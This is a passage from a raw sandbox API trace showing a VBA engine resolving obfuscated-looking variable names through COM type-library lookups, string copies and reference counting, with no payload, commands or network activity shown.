pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82316, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bAZAAw") returned 7 [0069.831] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bAZAAw", lHashVal=0x10bb24, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bAZAAw") returned 0x10bb24 [0069.831] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="bAZAAw" | out: _Dst="bAZAAw") returned 0x0 [0069.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="bAZAAw") returned 7 [0069.831] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.831] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bAZAAw", lHashVal=0x10bb24, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.831] IUnknown:Release (This=0x665ba50) returned 0xd [0069.831] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.831] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bAZAAw", lHashVal=0x10bb24, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.831] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.831] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.831] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bAZAAw", lHashVal=0x10bb24, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.831] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.831] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.831] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bAZAAw", lHashVal=0x10bb24, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.831] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82316, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bAZAAw") returned 7 [0069.831] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bAZAAw", lHashVal=0x10bb24, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.831] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.831] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b82316 | out: _Dst=0x67c2d40) returned 0x0 [0069.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_bAZAAw") returned 0x10358e [0069.831] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_bAZAAw" | out: _Dst="_B_var_bAZAAw") returned 0x0 [0069.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_bAZAAw") returned 14 [0069.832] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.832] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bAZAAw", lHashVal=0x10358e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.832] IUnknown:Release (This=0x665ba50) returned 0xd [0069.832] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.832] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bAZAAw", lHashVal=0x10358e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.832] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.832] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.832] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bAZAAw", lHashVal=0x10358e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.832] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.832] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.832] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bAZAAw", lHashVal=0x10358e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.832] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.832] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.832] IUnknown:Release (This=0x665ba50) returned 0xd [0069.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87178e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_bAZAAw") returned 14 [0069.832] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bAZAAw", lHashVal=0x10358e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.832] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82316 | out: _Dst=0x144ec0) returned 0x0 [0069.832] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZAAAcQQ", lHashVal=0x10b384, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8233e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZAAAcQQ") returned 8 [0069.832] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZAAAcQQ", lHashVal=0x10b384, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8233e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZAAAcQQ") returned 8 [0069.833] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZAAAcQQ", lHashVal=0x10b384, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZAAAcQQ") returned 0x10b384 [0069.833] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ZAAAcQQ" | out: _Dst="ZAAAcQQ") returned 0x0 [0069.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ZAAAcQQ") returned 8 [0069.833] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.833] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZAAAcQQ", lHashVal=0x10b384, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.833] IUnknown:Release (This=0x665ba50) returned 0xd [0069.833] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.833] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZAAAcQQ", lHashVal=0x10b384, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.833] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.833] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.833] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZAAAcQQ", lHashVal=0x10b384, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.833] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.833] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.833] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZAAAcQQ", lHashVal=0x10b384, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.833] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8233e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZAAAcQQ") returned 8 [0069.833] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZAAAcQQ", lHashVal=0x10b384, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.833] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.833] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8233e | out: _Dst=0x67c2d40) returned 0x0 [0069.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZAAAcQQ") returned 0x10a787 [0069.833] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="mcGxAA", cchCount1=-1, lpString2="_B_var_ZAAAcQQ", cchCount2=-1) returned 3 [0069.833] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ZAAAcQQ" | out: _Dst="_B_var_ZAAAcQQ") returned 0x0 [0069.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ZAAAcQQ") returned 15 [0069.834] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.834] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZAAAcQQ", lHashVal=0x10a787, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.834] IUnknown:Release (This=0x665ba50) returned 0xd [0069.834] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.834] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZAAAcQQ", lHashVal=0x10a787, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.834] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.834] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.834] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZAAAcQQ", lHashVal=0x10a787, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.834] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.834] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.834] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZAAAcQQ", lHashVal=0x10a787, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.834] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.834] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.834] IUnknown:Release (This=0x665ba50) returned 0xd [0069.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8717be, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ZAAAcQQ") returned 15 [0069.834] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZAAAcQQ", lHashVal=0x10a787, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0) returned 0x0 [0069.834] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8233e | out: _Dst=0x144ec0) returned 0x0 [0069.834] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DAAAx_14", lHashVal=0x10e747, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82366, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="DAAAx_14") returned 9 [0069.834] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DAAAx_14", lHashVal=0x10e747, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82366, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="DAAAx_14") returned 9 [0069.835] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DAAAx_14", lHashVal=0x10e747, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAAAx_14") returned 0x10e747 [0069.835] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="DAAAx_14" | out: _Dst="DAAAx_14") returned 0x0 [0069.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="DAAAx_14") returned 9 [0069.835] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.835] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DAAAx_14", lHashVal=0x10e747, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.835] IUnknown:Release (This=0x665ba50) returned 0xd [0069.835] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.835] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DAAAx_14", lHashVal=0x10e747, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.835] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.835] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.835] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DAAAx_14", lHashVal=0x10e747, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.835] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.835] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.835] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DAAAx_14", lHashVal=0x10e747, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.835] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82366, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="DAAAx_14") returned 9 [0069.835] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DAAAx_14", lHashVal=0x10e747, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.835] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.835] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b82366 | out: _Dst=0x67c2d40) returned 0x0 [0069.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DAAAx_14") returned 0x10bed0 [0069.836] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_DAAAx_14" | out: _Dst="_B_var_DAAAx_14") returned 0x0 [0069.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_DAAAx_14") returned 16 [0069.836] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.836] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DAAAx_14", lHashVal=0x10bed0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.836] IUnknown:Release (This=0x665ba50) returned 0xd [0069.836] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.836] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DAAAx_14", lHashVal=0x10bed0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.836] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.836] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.836] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DAAAx_14", lHashVal=0x10bed0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.836] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.836] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.836] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DAAAx_14", lHashVal=0x10bed0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.836] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.836] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.836] IUnknown:Release (This=0x665ba50) returned 0xd [0069.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8717ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_DAAAx_14") returned 16 [0069.836] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DAAAx_14", lHashVal=0x10bed0, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0069.836] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82366 | out: _Dst=0x144ec0) returned 0x0 [0069.836] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rAUQoA", lHashVal=0x10a132, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82392, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="rAUQoA") returned 7 [0069.836] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rAUQoA", lHashVal=0x10a132, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82392, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="rAUQoA") returned 7 [0069.837] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rAUQoA", lHashVal=0x10a132, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rAUQoA") returned 0x10a132 [0069.837] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="rAUQoA" | out: _Dst="rAUQoA") returned 0x0 [0069.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="rAUQoA") returned 7 [0069.837] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.837] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rAUQoA", lHashVal=0x10a132, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.837] IUnknown:Release (This=0x665ba50) returned 0xd [0069.837] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.837] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rAUQoA", lHashVal=0x10a132, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.837] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.837] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.837] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rAUQoA", lHashVal=0x10a132, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.837] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.837] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.837] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rAUQoA", lHashVal=0x10a132, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.837] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82392, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="rAUQoA") returned 7 [0069.837] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rAUQoA", lHashVal=0x10a132, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.837] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.837] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b82392 | out: _Dst=0x67c2d40) returned 0x0 [0069.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rAUQoA") returned 0x101b9c [0069.837] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_rAUQoA" | out: _Dst="_B_var_rAUQoA") returned 0x0 [0069.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_rAUQoA") returned 14 [0069.837] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.837] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rAUQoA", lHashVal=0x101b9c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.837] IUnknown:Release (This=0x665ba50) returned 0xd [0069.838] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.838] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rAUQoA", lHashVal=0x101b9c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.838] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.838] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.838] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rAUQoA", lHashVal=0x101b9c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.838] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.838] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.838] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rAUQoA", lHashVal=0x101b9c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.838] IUnknown:Release (This=0x665b4b0) returned 